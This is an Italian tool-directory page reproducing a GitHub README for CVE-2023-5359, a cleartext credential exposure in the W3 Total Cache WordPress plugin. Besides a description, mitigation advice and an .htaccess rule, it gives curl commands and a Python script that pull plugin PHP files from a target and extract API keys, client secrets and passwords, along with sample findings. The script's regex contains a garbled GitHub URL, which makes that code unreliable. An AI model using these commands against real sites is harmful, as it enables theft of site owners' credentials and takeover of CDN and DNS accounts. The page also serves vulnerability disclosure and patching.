Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-5359 — CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Rileva credenziali esposte nelle versioni del plugin W3 Total Cache ≤ 2.7.5. | Kitploit
Strumenti/GitHubGitHub/enzocipher/cve-2023-5359
Scanner di VulnerabilitàAttacchi alle PasswordExploitRaccolta InformazioniSicurezza WebApprendimento e Formazione
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Rileva credenziali esposte nelle versioni del plugin W3 Total Cache ≤ 2.7.5.

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-5359 - Vulnerabilità di archiviazione in chiaro di W3 Total Cache

Descrizione

CVE-2023-5359 è una vulnerabilità di archiviazione in chiaro che interessa il plugin WordPress W3 Total Cache nelle versioni ≤ 2.7.5. Questa vulnerabilità consente a utenti malintenzionati remoti di accedere a credenziali sensibili archiviate in file PHP non crittografati e accessibili pubblicamente.

Gravità

  • Punteggio CVSS: 7.5 (Alta)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Tipo: Esposizione di informazioni sensibili

Vulnerabilità Tecnica

Causa Principale

W3 Total Cache memorizza le impostazioni di configurazione e le credenziali API in file PHP all'interno della directory /wp-content/plugins/w3-total-cache/ senza un'adeguata protezione. Questi file sono accessibili tramite HTTP, esponendo:

  • Chiavi API (CloudFlare, Google, ecc.)
  • Secret del client
  • Token OAuth
  • Credenziali di servizi esterni

File Interessati

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

Sfruttamento

Metodo Manuale

root@kitploit:~
# Verifica se W3 Total Cache è installato
curl -s https://target.com/ | grep "w3-total-cache"

# Estrai le credenziali CloudFlare
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Cerca in tutti i file vulnerabili
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

Script Automatico

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

Impatto

Un utente malintenzionato può ottenere:

  1. Credenziali CloudFlare - Prendere il controllo di CDN e DNS
  2. Chiavi API per servizi esterni - Accedere ad account esterni
  3. Token OAuth - Impersonare l'identità
  4. Configurazioni della cache - Manipolare i contenuti serviti

Mitigazione

Soluzione Immediata

  1. Aggiornare a W3 Total Cache ≥ 2.7.6
  2. Limitare l'accesso ai file PHP nella directory dei plugin
  3. Revocare e rigenerare tutte le credenziali esposte

Configurazione Sicura

root@kitploit:~
# Protezione .htaccess
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

Rilevamento

Comando di Verifica

root@kitploit:~
# Verifica la versione vulnerabile
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

Indicatori di Compromissione

  • Attività insolita nelle API esterne
  • Modifiche nelle configurazioni CloudFlare
  • Traffico da IP non autorizzati verso servizi collegati

Esempio di Riscontro

root@kitploit:~
[*] Scansione: https://example.com
[+] W3 Total Cache rilevato
[+] File accessibile: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENZIALI TROVATE:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

Riferimenti

  • CVE-2023-5359
  • Changelog di W3 Total Cache
  • Team di sicurezza di WordPress

Avviso Legale

Questo repository è solo per scopi educativi e test di penetrazione autorizzati. L'uso malevolo di queste informazioni è severamente proibito.


Hai trovato utili queste informazioni? Metti una stella al repository!

Ultimo aggiornamento: Novembre 2025

Scarica lo strumento